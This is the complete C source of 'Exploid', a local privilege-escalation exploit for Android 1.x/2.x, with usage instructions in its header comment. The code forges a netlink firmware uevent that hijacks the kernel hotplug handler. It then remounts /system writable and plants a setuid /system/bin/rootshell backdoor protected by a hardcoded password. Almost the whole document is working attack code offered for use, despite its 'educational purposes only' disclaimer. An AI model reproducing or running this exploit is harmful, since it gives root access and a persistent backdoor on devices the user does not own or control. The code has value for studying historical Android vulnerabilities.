Exploid for Android

1. /* android 1.x/2.x the real youdev feat. init local root exploit.
2.  * (C) 2009/2010 by The Android Exploid Crew.
3.  *
4.  * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
5.  * Or use /data/local/tmp if available (thx to ioerror!) It is important to
6.  * to use /sqlite_stmt_journals directory if available.
7.  * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
8.  * or use USB keys etc. This will invoke hotplug which is actually
9.  * our exploit making /system/bin/rootshell.
10.  * This exploit requires /etc/firmware directory, e.g. it will
11.  * run on real devices and not inside the emulator.
12.  * I'd like to have this exploitet by using the same blockdevice trick
13.  * as in udev, but internal structures only allow world writable char
14.  * devices, not block devices, so I used the firmware subsystem.
15.  *
16.  * !!!This is PoC code for educational purposes only!!!
17.  * If you run it, it might crash your device and make it unusable!
18.  * So you use it at your own risk!
19.  *
20.  * Thx to all the TAEC supporters.
21.  */
22. #include <stdio.h>
23. #include <sys/socket.h>
24. #include <sys/types.h>
25. #include <linux/netlink.h>
26. #include <fcntl.h>
27. #include <errno.h>
28. #include <stdlib.h>
29. #include <string.h>
30. #include <string.h>
31. #include <unistd.h>
32. #include <sys/stat.h>
33. #include <signal.h>
34. #include <sys/mount.h>
35.  
36.  
37. // CHANGE!
38. #define SECRET "secret"
39.  
40.  
41. void die(const char *msg)
42. {
43.     perror(msg);
44.     exit(errno);
45. }
46.  
47.  
48. void copy(const char *from, const char *to)
49. {
50.     int fd1, fd2;
51.     char buf[0x1000];
52.     ssize_t r = 0;
53.  
54.     if ((fd1 = open(from, O_RDONLY)) < 0)
55.         die("[-] open");
56.     if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0)
57.         die("[-] open");
58.     for (;;) {
59.         r = read(fd1, buf, sizeof(buf));
60.         if (r < 0)
61.             die("[-] read");
62.         if (r == 0)
63.             break;
64.         if (write(fd2, buf, r) != r)
65.             die("[-] write");
66.     }
67.  
68.     close(fd1);
69.     close(fd2);
70.     sync(); sync();
71. }
72.  
73.  
74. void clear_hotplug()
75. {
76.     int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
77.     write(ofd, "", 1);
78.     close(ofd);
79. }
80.  
81.  
82. void rootshell(char **env)
83. {
84.     char pwd[128];
85.     char *sh[] = {"/system/bin/sh", 0};
86.  
87.     memset(pwd, 0, sizeof(pwd));
88.     readlink("/proc/self/fd/0", pwd, sizeof(pwd));
89.     if (strncmp(pwd, "/dev/pts/", 9) != 0)
90.         die("[-] memory tricks");
91.  
92.     write(1, "Password (echoed):", 18);
93.     memset(pwd, 0, sizeof(pwd));
94.     read(0, pwd, sizeof(pwd) - 1);
95.     sleep(2);
96.  
97.     if (strlen(pwd) < 6)
98.         die("[-] password too short");
99.     if (memcmp(pwd, SECRET, strlen(SECRET)) != 0)
100.         die("[-] wrong password");
101.  
102.     setuid(0); setgid(0);
103.     execve(*sh, sh, env);
104.     die("[-] execve");
105. }
106.  
107.  
108. int main(int argc, char **argv, char **env)
109. {
110.     char buf[512], path[512];
111.     int ofd;
112.     struct sockaddr_nl snl;
113.     struct iovec iov = {buf, sizeof(buf)};
114.     struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
115.     int sock;
116.     char *basedir = NULL;
117.  
118.  
119.     /* I hope there is no LD_ bug in androids rtld :) */
120.     if (geteuid() == 0 && getuid() != 0)
121.         rootshell(env);
122.  
123.     if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
124.         die("[-] readlink");
125.  
126.     if (geteuid() == 0) {
127.         clear_hotplug();
128.         /* remount /system rw */
129.         if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0)
130.             mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0);
131.         copy(path, "/system/bin/rootshell");
132.         chmod("/system/bin/rootshell", 04711);
133.         for (;;);
134.     }
135.  
136.     printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
137.  
138.     basedir = "/sqlite_stmt_journals";
139.     if (chdir(basedir) < 0) {
140.         basedir = "/data/local/tmp";
141.         if (chdir(basedir) < 0)
142.             basedir = strdup(getcwd(buf, sizeof(buf)));
143.     }
144.     printf("[+] Using basedir=%s, path=%s\n", basedir, path);
145.     printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");
146.  
147.     memset(&snl, 0, sizeof(snl));
148.     snl.nl_pid = 1;
149.     snl.nl_family = AF_NETLINK;
150.  
151.     if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
152.         die("[-] socket");
153.  
154.     close(creat("loading", 0666));
155.     if ((ofd = creat("hotplug", 0644)) < 0)
156.         die("[-] creat");
157.     if (write(ofd, path , strlen(path)) < 0)
158.         die("[-] write");
159.     close(ofd);
160.     symlink("/proc/sys/kernel/hotplug", "data");
161.     snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
162.              "SUBSYSTEM=firmware%c"
163.              "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
164.     printf("[+] sending add message ...\n");
165.     if (sendmsg(sock, &msg, 0) < 0)
166.         die("[-] sendmsg");
167.     close(sock);
168.     printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
169.            "[*] settings, plugin USB key etc.\n"
170.            "[*] You succeeded if you find /system/bin/rootshell.\n"
171.            "[*] GUI might hang/restart meanwhile so be patient.\n");
172.     sleep(3);
173.     return 0;
174. }